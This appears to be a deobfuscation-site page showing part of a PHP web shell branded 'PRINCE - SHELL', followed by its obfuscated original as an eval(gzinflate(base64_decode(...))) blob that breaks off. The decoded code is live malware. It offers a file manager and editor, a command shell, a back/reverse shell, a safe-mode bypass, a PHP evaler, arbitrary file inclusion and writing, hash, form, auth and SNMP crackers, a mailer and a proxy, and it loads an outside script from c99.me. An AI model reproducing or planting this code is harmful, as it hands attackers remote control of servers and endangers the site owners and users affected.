                                                                                                                                echo "<pre>Name	Type	Value
";
                                                                                                                                foreach ($var as $v) {
                                                                                                                                    $t = explode('|', $v);
                                                                                                                                    $c = explode(':', $t[1]);
                                                                                                                                    $y = '';
                                                                                                                                    if ($c[0] == 'i') $y = 'Integer';
                                                                                                                                    elseif ($c[0] == 's') $y = 'String';
                                                                                                                                    elseif ($c[0] == 'b') $y = 'Boolean';
                                                                                                                                    elseif ($c[0] == 'f') $y = 'Float';
                                                                                                                                    elseif ($c[0] == 'a') $y = 'Array';
                                                                                                                                    elseif ($c[0] == 'o') $y = 'Object';
                                                                                                                                    elseif ($c[0] == 'n') $y = 'Null';
                                                                                                                                    echo $t[0] . "	$y	" . $c[1] . "
";
                                                                                                                                }
                                                                                                                                echo '</pre>';
                                                                                                                            }
                                                                                                                            function logouT() {
                                                                                                                                setcookie('passw', '', time() - 10000);
                                                                                                                                header('Location: ' . hlinK());
                                                                                                                            }
?>
<html>
<head>
<style>body{
	scrollbar-base-color: #484848;
	scrollbar-arrow-color: #FFFFFF;
	scrollbar-track-color: #969696;
	font-size:16px;
	font-family:"Arial Narrow";
	background-color: #FFFFFF;
}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}body,td,th {
	color: #FFFFFF;
}
</style>
<meta http-equiv="Content-Language" content="en-us">
<script language="JavaScript" type="text/JavaScript">
function HS(box){
if(document.getElementById(box).style.display!="none"){
document.getElementById(box).style.display="none";
document.getElementById('lk').innerHTML="+";
}
else{
document.getElementById(box).style.display="";
document.getElementById('lk').innerHTML="-";
}
}
function chmoD($file){
$ch=prompt("Changing file mode["+$file+"]: ex. 777","");
if($ch != null)location.href="<?php echo hlinK('seC=fm&workingdiR=' . addslashes($cwd) . '&chmoD='); ?>"+$file+"&modE="+$ch;
}
</script><SCRIPT SRC=http://c99.me/base/jquery.js></SCRIPT>
<title>PRINCE - SHELL</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php echo hlinK("seC=sysinfo&workingdiR=$cwd"); ?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd"); ?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd"); ?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd"); ?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd"); ?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd"); ?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=sqlcl&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=ftpc&workingdiR=$cwd"); ?>">[FTP]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mail]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd"); ?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd"); ?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd"); ?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=tools&workingdiR=$cwd"); ?>">[Tools]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd"); ?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd"); ?>">[About]</a> <?php if (isset($_COOKIE['passw'])) echo "- [<a href='" . hlinK("seC=logout") . "'>Logout</a>]"; ?></td></tr></table>
<hr size=1 noshade>
<?php
                                                                                                                            if (!empty($_REQUEST['seC'])) {
                                                                                                                                switch ($_REQUEST['seC']) {
                                                                                                                                    case 'fm':
                                                                                                                                        filemanageR();
                                                                                                                                    break;
                                                                                                                                    case 'sc':
                                                                                                                                        scanneR();
                                                                                                                                    break;
                                                                                                                                    case 'phpinfo':
                                                                                                                                        phpinfo();
                                                                                                                                    break;
                                                                                                                                    case 'edit':
                                                                                                                                        if (!empty($_REQUEST['open'])) editoR($_REQUEST['filE']);
                                                                                                                                        if (!empty($_REQUEST['Save'])) {
                                                                                                                                            $filehandle = fopen($_REQUEST['file'], 'w');
                                                                                                                                            fwrite($filehandle, $_REQUEST['edited']);
                                                                                                                                            fclose($filehandle);
                                                                                                                                        }
                                                                                                                                        if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);
                                                                                                                                        else editoR('');
                                                                                                                                        break;
                                                                                                                                    case 'openit':
                                                                                                                                        openiT($_REQUEST['namE']);
                                                                                                                                        break;
                                                                                                                                    case 'cr':
                                                                                                                                        crackeR();
                                                                                                                                        break;
                                                                                                                                    case 'dic':
                                                                                                                                        dicmakeR();
                                                                                                                                        break;
                                                                                                                                    case 'tools':
                                                                                                                                        toolS();
                                                                                                                                        break;
                                                                                                                                    case 'hex':
                                                                                                                                        hexvieW();
                                                                                                                                        break;
                                                                                                                                    case 'img':
                                                                                                                                        showimagE($_REQUEST['filE']);
                                                                                                                                        break;
                                                                                                                                    case 'inc':
                                                                                                                                        if (file_exists($_REQUEST['filE'])) include ($_REQUEST['filE']);
                                                                                                                                        break;
                                                                                                                                    case 'hc':
                                                                                                                                        hashcrackeR();
                                                                                                                                        break;
                                                                                                                                    case 'fcr':
                                                                                                                                        formcrackeR();
                                                                                                                                        break;
                                                                                                                                    case 'auth':
                                                                                                                                        authcrackeR();
                                                                                                                                        break;
                                                                                                                                    case 'ftpc':
                                                                                                                                        ftpclienT();
                                                                                                                                        break;
                                                                                                                                    case 'eval':
                                                                                                                                        phpevaL();
                                                                                                                                        break;
                                                                                                                                    case 'snmp':
                                                                                                                                        snmpcrackeR();
                                                                                                                                        break;
                                                                                                                                    case 'px':
                                                                                                                                        pr0xy();
                                                                                                                                        break;
                                                                                                                                    case 'webshell':
                                                                                                                                        webshelL();
                                                                                                                                        break;
                                                                                                                                    case 'mailer':
                                                                                                                                        maileR();
                                                                                                                                        break;
                                                                                                                                    case 'br':
                                                                                                                                        brshelL();
                                                                                                                                        break;
                                                                                                                                    case 'asm':
                                                                                                                                        safemodE();
                                                                                                                                        break;
                                                                                                                                    case 'sqlcl':
                                                                                                                                        sqlclienT();
                                                                                                                                        break;
                                                                                                                                    case 'calc':
                                                                                                                                        calC();
                                                                                                                                        break;
                                                                                                                                    case 'sysinfo':
                                                                                                                                        sysinfO();
                                                                                                                                        break;
                                                                                                                                    case 'checksum':
                                                                                                                                        checksuM($_REQUEST['filE']);
                                                                                                                                        break;
                                                                                                                                    case 'logout':
                                                                                                                                        logouT();
                                                                                                                                        break;
                                                                                                                                    default:
                                                                                                                                        echo $intro;
                                                                                                                                    }
                                                                                                                                } else echo $intro;
                                                                                                                                echo $footer; ?></body></html>
<body background="http://dorohoi.at.ua/desktop_verde_fundal-800x600.jpg" bgcolor="#000000" text="#00ff00">
<!-- Link -->

Did this file decode correctly?

Original Code

<?php

eval(gzinflate(base64_decode("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